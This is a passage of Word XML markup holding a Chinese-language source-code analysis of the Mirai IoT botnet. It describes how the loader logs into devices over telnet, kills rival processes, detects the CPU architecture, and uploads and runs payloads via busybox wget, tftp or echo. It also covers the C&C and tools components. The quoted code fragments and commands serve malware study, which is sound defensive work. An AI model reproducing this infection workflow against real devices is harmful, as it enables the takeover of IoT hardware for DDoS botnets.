      <w:proofErr w:type="spellStart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pid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9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同时，如果/proc/$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/exe文件匹配了下述字段，对应进程也要被kill掉：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REPORT %s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:%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s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HTTPFLOOD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LOLNOGTFO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\x58\x4D\x4E\x4E\x43\x50\x46\x22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zollard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pacing w:after="100"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E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.2 loader</w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>分析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这部分代码的功能就是</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>向感染</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>设备上传（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tftp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、echo方式）对应架构的payload文件，loader/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的目录结构如下：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headers/   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头文件目录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binary.c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将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bins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目录下的文件读取到内存中，以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echo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方式上传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payload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文件时用到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connection.c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判断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loader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和感染设备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交互过程中的状态信息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main.c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 loader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主函数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server.c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向感染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设备发起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交互，上传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payload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文件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telnet_info.c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解析约定格式的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信息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util.c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一些常用的公共函数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从功能逻辑上看，还需要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mirai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/tools/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scanListen.go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的配合来监听上报的telnet信息，因为main函数中只能从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stdin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读取对应信息：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// Read from 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stdin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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while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(TRUE)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{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strbuf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1024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];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fgets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strbuf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sizeof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strbuf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stdin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 == NULL)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break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......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memset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&amp;info,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sizeof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telnet_info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解析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telnet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信息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telnet_info_parse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strbuf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, &amp;info) == NULL)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接下来我们对这块内容进行详细的分析，同样先看下那些公共函数，也就是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util.c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文件，如下：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/******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util.c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******/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输出地址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addr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处开始的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len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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个</w:t>
      </w:r>
      <w:proofErr w:type="gram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字节的内存数据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hexDump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desc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addr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//bind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可用地址并设置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socket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为非阻塞模式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lastRenderedPageBreak/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util_socket_and_bind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server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srv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查找字节序列中是否存在特定的子字节序列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util_memsearch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buf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buf_len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*mem,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mem_len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发送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socket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数据包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BOOL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sockprintf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const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fmt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...);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去掉字符串首尾的空格字符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util_trim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str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其中用的最经常的是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util_sockprintf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函数，简单理解就是send发包，但每次的参数个数是可变的。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继续，虽然loader的主要功能在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server.c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中，但分析它之前我们需要看下余 下的3个c文件，因为很多调用的功能是在其中实现的，首先是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binary.c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文件中的函数：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/******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binary.c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******/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bin_list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初始化，读取所有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bins/dlr.*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文件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BOOL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binary_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init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{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......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匹配所有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bins/dlr.*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文件，结果存放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pglob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(glob(</w:t>
      </w:r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"bins/dlr.*"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, GLOB_ERR, NULL, &amp;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pglob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 !=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......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按照不同体系架构获取相应的二进制文件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binary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binary_get_by_arch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*arch);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将指定的二进制文件读取到内存中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static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BOOL load(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binary *bin,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fname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即将编译好的不同体系架构的二进制文件读取到内存中，当loader和感染设备建立telnet连接后，如果不得不通过echo命令来上传payload，那么这些数据就会用到了。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接着来看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telnet_info.c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文件中的函数，如下：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lastRenderedPageBreak/>
        <w:t>/******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telnet_info.c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******/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初始化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telnet_info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结构的变量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telnet_info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telnet_info_new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*user,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*pass,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*arch,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ipv4_t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addr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port_t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port,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telnet_info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*info);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解析节点的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telnet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信息，提取相关参数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telnet_info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telnet_info_parse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str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telnet_info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*out);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即解析telnet信息格式并存到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telnet_info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结构体中，通过获取这些信息就可以和受害者设备建立telnet连接了。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然后是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connection.c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文件中的函数，主要用来判断telnet</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>交互中</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的状态信息，如下，只列出部分：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/******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connection.c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******/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判断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telnet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连接是否顺利建立，若成功则发送回包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connection_consume_iacs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connection *conn);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判断是否收到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login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提示信息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connection_consume_login_prompt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connection *conn);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判断是否收到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password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提示信息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connection_consume_password_prompt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connection *conn);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根据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ps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命令返回结果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kill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掉某些特殊进程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connection_consume_psoutput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connection *conn);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判断系统的体系架构，即解析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ELF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文件头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connection_consume_arch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connection *conn);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判断采用哪种方式上传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payload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（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wget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、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tftp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、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echo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）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connection_consume_upload_methods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connection *conn);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判断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drop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的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payload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是否成功运行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connection_verify_payload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connection *conn);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对应的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telnet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连接状态为枚举类型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enum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{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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    TELNET_CLOSED,      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 0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TELNET_CONNECTING,  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 1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TELNET_READ_IACS,   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 2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TELNET_USER_PROMPT, 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 3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TELNET_PASS_PROMPT, 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 4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......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TELNET_RUN_BINARY,  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 18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TELNET_CLEANUP      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 19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}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state_telnet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这里要提一下程序在发包时用到的一个技巧，比如下面的代码：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sockprintf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conn-&gt;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"/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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busybox</w:t>
      </w:r>
      <w:proofErr w:type="spell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wget</w:t>
      </w:r>
      <w:proofErr w:type="spell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; /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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busybox</w:t>
      </w:r>
      <w:proofErr w:type="spell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tftp</w:t>
      </w:r>
      <w:proofErr w:type="spell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; "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TOKEN_QUERY </w:t>
      </w:r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"\r\n"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用在其它命令后作为一种标记，可判断之前的命令是否执行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92672"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">#define TOKEN_QUERY     </w:t>
      </w:r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"/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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busybox</w:t>
      </w:r>
      <w:proofErr w:type="spell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 xml:space="preserve"> ECCHI"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如果回包中有如下提示，</w:t>
      </w:r>
      <w:proofErr w:type="gram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则之前</w:t>
      </w:r>
      <w:proofErr w:type="gram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的命令执行了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92672"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>#define TOKEN_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="F92672"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">RESPONSE  </w:t>
      </w:r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proofErr w:type="gram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ECCHI: applet not found"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好了，至此我们已经知道如何将不同架构的二进制文件读到内存中、如何获取待感染设备的telnet信息以及如何判断telnet交互过程中的状态信息，那么下面就可以开始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server.c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文件的分析了，这里列出几个主要函数：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/******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server.c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******/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判断能否处理新的感染节点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server_queue_telnet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server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srv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telnet_info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*info);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处理新的感染节点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server_telnet_probe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server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srv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telnet_info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*info);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事件处理线程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static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*worker(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arg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{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server_worker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wrker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= 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server_worker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*)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arg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epoll_event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events[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128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];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bind_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core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wrker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thread_id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while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(TRUE)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等待事件的产生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n =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epoll_wait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wrker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efd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events,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127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, -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(n == -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perror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epoll_wait</w:t>
      </w:r>
      <w:proofErr w:type="spell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=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&lt; n;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++)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handle_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event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wrker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, &amp;events[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]);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事件处理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static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handle_event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server_worker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wrker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epoll_event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ev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由于loader可能需要处理很多的感染节点信息，因而设计成了多线程方式。对于每一个建立的telnet连接将采用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机制来做事件触发，相比select机制会更有优势，所以当loader通过获取的telnet信息连接感染设备后就开始等待相应事件，这其实是通过编写代码来模拟一个简单的渗透过程，即先发送请求包而后根据返回</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>包判断</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>并确定后续的操作，主要包括以下几步，对应的代码在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handle_event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函数中：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1）通过待感染节点的telnet用户名和密码成功登录； </w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>2）执行/bin/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busybox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，根据返回结果kill掉某些特殊进程； </w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>3）执行/bin/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busybox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 xml:space="preserve"> cat /proc/mounts，根据返回结果切换到可写目录； </w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>4）执行/bin/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busybox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 xml:space="preserve"> cat /bin/echo，通过返回结果解析/bin/echo这个ELF文件的头部来判断体系架构，即其中的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e_machine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字段; </w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>5）选择一种方式上传对应的payload文件，当然首先需要进行判断：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发请求包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sockprintf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conn-&gt;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"/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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busybox</w:t>
      </w:r>
      <w:proofErr w:type="spell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wget</w:t>
      </w:r>
      <w:proofErr w:type="spell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; /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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busybox</w:t>
      </w:r>
      <w:proofErr w:type="spell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tftp</w:t>
      </w:r>
      <w:proofErr w:type="spell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; "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TOKEN_QUERY </w:t>
      </w:r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"\r\n"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在返回包中进行判断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lastRenderedPageBreak/>
        <w:t>if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util_memsearch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(conn-&gt;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rdbuf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offset, </w:t>
      </w:r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wget</w:t>
      </w:r>
      <w:proofErr w:type="spell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: applet not found"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22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 == -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conn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info.upload_method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= UPLOAD_WGET;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else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if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util_memsearch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(conn-&gt;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rdbuf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offset, </w:t>
      </w:r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tftp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="A6E22E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>: applet not found"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22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 == -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conn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info.upload_method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= UPLOAD_TFTP;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else</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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conn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info.upload_method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= UPLOAD_ECHO;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oader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同时支持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tftp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、echo的方式来上传payload，其中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tftp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服务器的相关信息在创建server时需要给出：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server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server_create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(uint8_t threads, uint8_t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addr_len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, ipv4_t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addrs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uint32_t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max_open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wghip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port_t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wghp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thip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);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 //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wget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服务器的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ip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和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port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，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tftp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服务器的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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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98080" cy="4122420"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="http://paper.seebug.org/content/images/2016/12/A0A89109-DAD4-412D-9CD2-EF40B3651F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per.seebug.org/content/images/2016/12/A0A89109-DAD4-412D-9CD2-EF40B3651F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6）执行payload并清理。 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>通过上述这几个简单的步骤，loader就能成功实现对受害者节点的感染了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E715F9" w:rsidRPr="00E715F9" w:rsidRDefault="00E715F9" w:rsidP="00E715F9">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="100"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E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>cnc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>简单分析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cnc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目录主要提供用户管理的接口、处理攻击请求并下发攻击命令：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admin.go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处理管理员登录、创建新用户以及初始化攻击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api.go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向感染</w:t>
      </w:r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的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bot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节点发送命令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attack.go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处理用户的攻击请求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clientList.go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管理感染的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bot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节点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database.go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数据库管理，包括用户登录验证、新建用户、处理白名单、验证用户的攻击请求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main.go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程序入口，开启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23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端口和</w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="AE81FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>101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端口的监听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而tools目录主要提供了一些工具，相应的功能如下：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enc.c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对数据进行异或加密处理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nogdb.c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通过修改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elf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文件头实现反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gdb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调试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scanListen.go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监听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payload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（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bot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）扫描后上报的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telnet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信息，并将结果交由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loader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处理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single_load.c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另一个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loader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实现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wget.c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实现了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wget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文件下载</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E715F9" w:rsidRPr="00E715F9" w:rsidRDefault="00E715F9" w:rsidP="00E715F9">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="288" w:lineRule="atLeast"/>
        <w:ind w:hanging="30"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-15"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-15"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-15"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>后记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总体来看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Mirai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源码代码量不大而且编码风格比较清晰，理解起来并不难。但是有些地方逻辑上还存在瑕疵，例如：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//***loader/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util.c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*** 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查找字节序列中是否存在特定的子字节序列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</w:pP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逻辑不对，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util_memsearch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("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aabc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", 4, "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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abc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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", 3)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9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就不满足</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E715F9" w:rsidRPr="00E715F9" w:rsidRDefault="00E715F9" w:rsidP="00E715F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="2231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util_memsearch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buf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buf_len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char</w:t>
      </w:r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*mem, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="66D9EF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>mem_len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="F8F8F2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E715F9" w:rsidRPr="00E715F9" w:rsidRDefault="00E715F9" w:rsidP="00E715F9">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="384" w:after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5F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>但作为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IoT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>下的恶意程序源码还是很值得参考的，特别是随着最近新变种的出现。可想而知变种会加入更多的反调试手段来阻碍分析，而且交互的数据包会更多的采用加密处理，这点还是很容易的，比如在原先异或的基础上加个查表操作，同时对于不同漏洞的利用也会更加的模块化。正因如此，研究其最初的源码是十分有必要的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E715F9" w:rsidRPr="00E715F9" w:rsidRDefault="00E715F9" w:rsidP="00E715F9">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="288" w:lineRule="atLeast"/>
        <w:ind w:hanging="30"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-15"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-15"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-15"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E715F9" w:rsidRPr="00E715F9" w:rsidRDefault="00E715F9" w:rsidP="00E715F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E715F9">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="57A3E8"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/jgamblin/Mirai-Source-Code</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E715F9" w:rsidRPr="00E715F9" w:rsidRDefault="00E715F9" w:rsidP="00E715F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E715F9">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="57A3E8"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E715F9" w:rsidRPr="00E715F9" w:rsidRDefault="00E715F9" w:rsidP="00E715F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.3w191m1y0" w:history="1">
        <w:r w:rsidRPr="00E715F9">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="57A3E8"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://medium.com/@cjbarker/mirai-ddos-source-code-review-57269c4a68f#.3w191m1y0</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009E5BCF" w:rsidRPr="00E715F9" w:rsidRDefault="009E5BCF">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="009E5BCF" w:rsidRPr="00E71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452F6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D806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F9"/>
    <w:rsid w:val="009E5BCF"/>
    <w:rsid w:val="00E7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4DC0E-2AED-41DF-A7E5-69C5CE91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15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715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15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15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715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715F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t-time">
    <w:name w:val="post-time"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E715F9"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E715F9"/>
  </w:style>
  <w:style w:type="character" w:styleId="a3">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E715F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715F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715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715F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15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15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15F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715F9"/>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00E715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medium.com/@cjbarker/mirai-ddos-source-code-review-57269c4a6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per.seebug.org/author/admin-user/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://paper.seebug.org/tag/vul-analysis/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jgamblin/Mirai-Source-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2124</Words>
  <Characters>12112</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>100</Lines>
  <Paragraphs>28</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>14208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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-22T11:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-22T11:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>